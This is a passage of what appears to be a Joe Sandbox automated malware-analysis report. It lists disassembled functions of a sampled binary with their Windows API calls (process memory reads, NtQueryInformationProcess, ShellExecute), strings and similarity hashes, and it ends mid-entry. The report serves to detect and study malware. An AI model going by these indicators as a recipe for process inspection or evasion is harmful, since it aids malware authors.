                                                                                                                                            • Opcode ID: 6c499aacc5df9b586405a5e1cfaff54e551e94e08c816b9cea67992b9cb196df
                                                                                                                                            • Instruction ID: 0ae7b1750fa9cbf8dd67589797605c2197cf400aa876b95efa45cdc5ca8a3153
                                                                                                                                            • Opcode Fuzzy Hash: 6c499aacc5df9b586405a5e1cfaff54e551e94e08c816b9cea67992b9cb196df
                                                                                                                                            • Instruction Fuzzy Hash: C4B1B07551110AAFCF1BDFA8C976DFE3BB9EB08340F115619FA02A66D2D631CA10DB50
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 002F36D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 002F3735
                                                                                                                                              • Part of subcall function 002F36D0: _wcschr.LIBVCRUNTIME ref: 002F37C6
                                                                                                                                            • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 002F3CA8
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 002F3D01
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 002F3D7A
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 002F3EB1
                                                                                                                                            • GetLastError.KERNEL32 ref: 002F3F34
                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 002F3F7B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                            • String ID: NtQueryInformationProcess$14
                                                                                                                                            • API String ID: 566592816-1595157856
                                                                                                                                            • Opcode ID: b03251b7317c1bf001d463de2193c0a3322c4079e69e915cb26163caa7d28289
                                                                                                                                            • Instruction ID: 5541fc2af993727f4874b0b84d2921b9bd19bd4888f60ff8b3e178b8f284b999
                                                                                                                                            • Opcode Fuzzy Hash: b03251b7317c1bf001d463de2193c0a3322c4079e69e915cb26163caa7d28289
                                                                                                                                            • Instruction Fuzzy Hash: B1A16A70D15649DEDB20CF64CC49BAEFBF4BF48304F2045A9D549A7280E7B5AA88CF91
                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00313F57
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00313F5F
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00313FE8
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00314013
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00314068
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: 21$TG1$csm
                                                                                                                                            • API String ID: 1170836740-680810872
                                                                                                                                            • Opcode ID: 0726102b12f27c8be4439cc445123695f377af57f282b806a1c256da009dacc5
                                                                                                                                            • Instruction ID: 53806feeeecfce5c58da4dfa5923a819fdcc840fd7a6608295808b3aabd13024
                                                                                                                                            • Opcode Fuzzy Hash: 0726102b12f27c8be4439cc445123695f377af57f282b806a1c256da009dacc5
                                                                                                                                            • Instruction Fuzzy Hash: 26418234E002099BCF1ADF68C881ADEBBB5BF4C314F148055E914AB392D731EE96CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030855C
                                                                                                                                            • _Maklocstr.LIBCPMT ref: 003085C5
                                                                                                                                            • _Maklocstr.LIBCPMT ref: 003085D7
                                                                                                                                            • _Maklocchr.LIBCPMT ref: 003085EF
                                                                                                                                            • _Maklocchr.LIBCPMT ref: 003085FF
                                                                                                                                            • _Getvals.LIBCPMT ref: 00308621
                                                                                                                                              • Part of subcall function 00301CD4: _Maklocchr.LIBCPMT ref: 00301D03
                                                                                                                                              • Part of subcall function 00301CD4: _Maklocchr.LIBCPMT ref: 00301D19
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                            • String ID: false$true
                                                                                                                                            • API String ID: 3549167292-2658103896
                                                                                                                                            • Opcode ID: f02e00df19704ebc09290755efe102e6ce0c67fd81b5c46e5086d153b356b838
                                                                                                                                            • Instruction ID: 470a628cc831c3d2ebc87a1a7e9838ce9a99c24a679c3d4a9c23365334b8ddf8
                                                                                                                                            • Opcode Fuzzy Hash: f02e00df19704ebc09290755efe102e6ce0c67fd81b5c46e5086d153b356b838
                                                                                                                                            • Instruction Fuzzy Hash: 7C2162B2D01318ABDF16EFA5D895ADF7BB8AF05710F00855AF9059F182DA70D540CBA1
                                                                                                                                            APIs
                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 002F9763
                                                                                                                                              • Part of subcall function 00300C94: __EH_prolog3.LIBCMT ref: 00300C9B
                                                                                                                                              • Part of subcall function 00300C94: std::_Lockit::_Lockit.LIBCPMT ref: 00300CA6
                                                                                                                                              • Part of subcall function 00300C94: std::locale::_Setgloballocale.LIBCPMT ref: 00300CC1
                                                                                                                                              • Part of subcall function 00300C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00300D17
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F978A
                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002F97F0
                                                                                                                                            • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 002F984A
                                                                                                                                              • Part of subcall function 002FF57A: __EH_prolog3.LIBCMT ref: 002FF581
                                                                                                                                              • Part of subcall function 002FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 002FF5C8
                                                                                                                                              • Part of subcall function 002FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 002FF620
                                                                                                                                              • Part of subcall function 002FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 002FF654
                                                                                                                                              • Part of subcall function 002FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 002FF6A8
                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,?,003454B1,00000000), ref: 002F99BF
                                                                                                                                            • __cftoe.LIBCMT ref: 002F9B0B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                            • String ID: bad locale name
                                                                                                                                            • API String ID: 3103716676-1405518554
                                                                                                                                            • Opcode ID: 69e009ed16c3cfe8b717a1fa098c61d358d5b27021e5c67ee8e68fbf08975319
                                                                                                                                            • Instruction ID: 6037b742f5757c233a0897d41178d129ee6d5a8b3ce3160d7bc4807a535f1613
                                                                                                                                            • Opcode Fuzzy Hash: 69e009ed16c3cfe8b717a1fa098c61d358d5b27021e5c67ee8e68fbf08975319
                                                                                                                                            • Instruction Fuzzy Hash: 11F1CC70D10249DFDB15CFA8C984BEEFBB5EF09344F244169E905AB381E771AA54CBA0
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00327632,00000021,FlsSetValue,0033BD58,0033BD60,?,?,00325955,00000006,000000FF,?,00316CE7,00000000,A82), ref: 003273BC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID: A82$api-ms-$ext-ms-
                                                                                                                                            • API String ID: 3664257935-4249869218
                                                                                                                                            • Opcode ID: 4702ccef3b470efb2984656c28ded2642d165b69897fed164962f7d3782111e6
                                                                                                                                            • Instruction ID: dfc91b97f0198c16c69f2f533a0d6e121ead1a91a8ec354b86052345826ff4bd
                                                                                                                                            • Opcode Fuzzy Hash: 4702ccef3b470efb2984656c28ded2642d165b69897fed164962f7d3782111e6
                                                                                                                                            • Instruction Fuzzy Hash: 0A21D57AA09221EBD733DB65BC81A9A376CFF42770F250514EE05A7290DB30ED00D6E0
                                                                                                                                            APIs
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,40000022,7642E7B1,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 002F4154
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,3FFFFFFF,7642E7B1,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 002F4177
                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002F4217
                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,7642E7B1,?,?,?), ref: 002F42D2
                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,7642E7B1,?,?,?), ref: 002F42F3
                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,7642E7B1,?,?,?), ref: 002F4326
                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,7642E7B1,?,?,?), ref: 002F4337
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F4355
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F4371
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1424318461-0
                                                                                                                                            • Opcode ID: 0cfbf713204f203e9e4b92189e2a2892f5fc2c80837d71c844285d46831e90ae
                                                                                                                                            • Instruction ID: af8002e4006b3c2adf8fdc386420993273cee8c24cb6f8e45543334d64146a3b
                                                                                                                                            • Opcode Fuzzy Hash: 0cfbf713204f203e9e4b92189e2a2892f5fc2c80837d71c844285d46831e90ae
                                                                                                                                            • Instruction Fuzzy Hash: F581A271A102099FDB15DFA8C985BAEFBB4FB48350F244239EA25E7390D770AD50CB90
                                                                                                                                            APIs
                                                                                                                                            • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 003126F8
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00312786
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 003127B0
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003127F8
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00312812
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00312838
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00312875
                                                                                                                                            • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00312892
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3603178046-0
                                                                                                                                            • Opcode ID: 867391bfa5e754d71af99f7fc45df4645eee7fd5dd986b680a734cccb25643f9
                                                                                                                                            • Instruction ID: 5c2efea5006ea2ec31580733afb51d256a0c93e7af5edc77b07aac3c03a2f107
                                                                                                                                            • Opcode Fuzzy Hash: 867391bfa5e754d71af99f7fc45df4645eee7fd5dd986b680a734cccb25643f9
                                                                                                                                            • Instruction Fuzzy Hash: E071817590024AAFDF2B9F64CC85AEF7BBAAF4D750F260019F904A6191D735C9A0CB60
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 003121A3
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 003121CF
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0031220E
                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031222B
                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0031226A
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00312287
                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003122C9
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003122EC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                            • Opcode ID: 7599b45732e7a0cdc925eb6dfd096b9b8d011e397bd2d514eabd67cd3c89d357
                                                                                                                                            • Instruction ID: 73de026ae080f5d102159098d102f34a769d74c88f2a7f7d02484f3b96c21eed
                                                                                                                                            • Opcode Fuzzy Hash: 7599b45732e7a0cdc925eb6dfd096b9b8d011e397bd2d514eabd67cd3c89d357
                                                                                                                                            • Instruction Fuzzy Hash: CA51C17260020ABFDB2A8F64CC45FEF7BA9EF48740F124824FE11AA150D734DDA19B60
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F8657
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F8679
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002F86A1
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000044,00000000,7642E7B1,?,00000000), ref: 002F86F9
                                                                                                                                            • __Getctype.LIBCPMT ref: 002F877B
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002F87E4
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002F880E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2372200979-0
                                                                                                                                            • Opcode ID: d4a30ec31b488b1878458eb66d3481c3fd9cf11df925b8aae8bc6d85b08c68c9
                                                                                                                                            • Instruction ID: 9650da863da2e044e85205d7bc7b91c66c2e731040aabc95aa7139bd62a79de1
                                                                                                                                            • Opcode Fuzzy Hash: d4a30ec31b488b1878458eb66d3481c3fd9cf11df925b8aae8bc6d85b08c68c9
                                                                                                                                            • Instruction Fuzzy Hash: E361E0B5C10649CFDB22CF68C940BAAFBF4FF14714F148269D945AB391EB34AA44CB91
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F92A0
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F92C2
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002F92EA
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000018,00000000,7642E7B1,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 002F9342
                                                                                                                                            • __Getctype.LIBCPMT ref: 002F93BD
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002F93F8
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002F9422
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2372200979-0
                                                                                                                                            • Opcode ID: e20c284404df93b0e800ceabc1844039dc0c73d0268bf029928178bebc731b95
                                                                                                                                            • Instruction ID: e6ddebb528ca142a67b280dbf27dbc6b4afe00e40fdffc1a9915275db325df21
                                                                                                                                            • Opcode Fuzzy Hash: e20c284404df93b0e800ceabc1844039dc0c73d0268bf029928178bebc731b95
                                                                                                                                            • Instruction Fuzzy Hash: 9951DE70D14209DFDB26CF68C844BAEBBF4EF14754F1081A9E945AB391DB70AE80CB91
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 002F6FB7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast
                                                                                                                                            • String ID: <S4$<S4$<S4$> returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                            • API String ID: 1452528299-3942388407
                                                                                                                                            • Opcode ID: e2cd86791a0139fae32c9820534ce95ed08bf300f69b564d75ce500fd9e7f0ec
                                                                                                                                            • Instruction ID: e46af84cb09c86dc21fcd6a7502de9949cb9319ce71c8cb8ff7b326273de2651
                                                                                                                                            • Opcode Fuzzy Hash: e2cd86791a0139fae32c9820534ce95ed08bf300f69b564d75ce500fd9e7f0ec
                                                                                                                                            • Instruction Fuzzy Hash: B621625DE2022687CB341F689405339E2E0EF64B94F65087FD9C9DB391EAA98C928395
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002FD883
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FD88D
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • numpunct.LIBCPMT ref: 002FD8C7
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FD8DE
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FD8FE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 743221004-1316489359
                                                                                                                                            • Opcode ID: 7d4953aa6194cfa35b00f5294fe27ffe515563f1901d5615e51529fc8f5d8372
                                                                                                                                            • Instruction ID: 9466c7c291f1b6339cc6208c50f7cf9762309b44c2a6efecbc120a65c76d3900
                                                                                                                                            • Opcode Fuzzy Hash: 7d4953aa6194cfa35b00f5294fe27ffe515563f1901d5615e51529fc8f5d8372
                                                                                                                                            • Instruction Fuzzy Hash: 1111E13991021E9BCF0AFF60D851ABEBB61AF84750F240829E511AF2D1CF70AE118B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302301
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030230B
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • codecvt.LIBCPMT ref: 00302345
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030235C
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030237C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 712880209-1316489359
                                                                                                                                            • Opcode ID: 185fade933aaa7b9b41258db53343965f1e180a7d431af002273fee6c15af11a
                                                                                                                                            • Instruction ID: e49255931e1e1e535d97101abd7d3d4ccd2dddac9e9888c558de60f86d06d918
                                                                                                                                            • Opcode Fuzzy Hash: 185fade933aaa7b9b41258db53343965f1e180a7d431af002273fee6c15af11a
                                                                                                                                            • Instruction Fuzzy Hash: 0C0100398016199BCB1BEB60D865BBEB7A4AF84710F250449F500AF2C1CF349E018B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302396
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003023A0
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
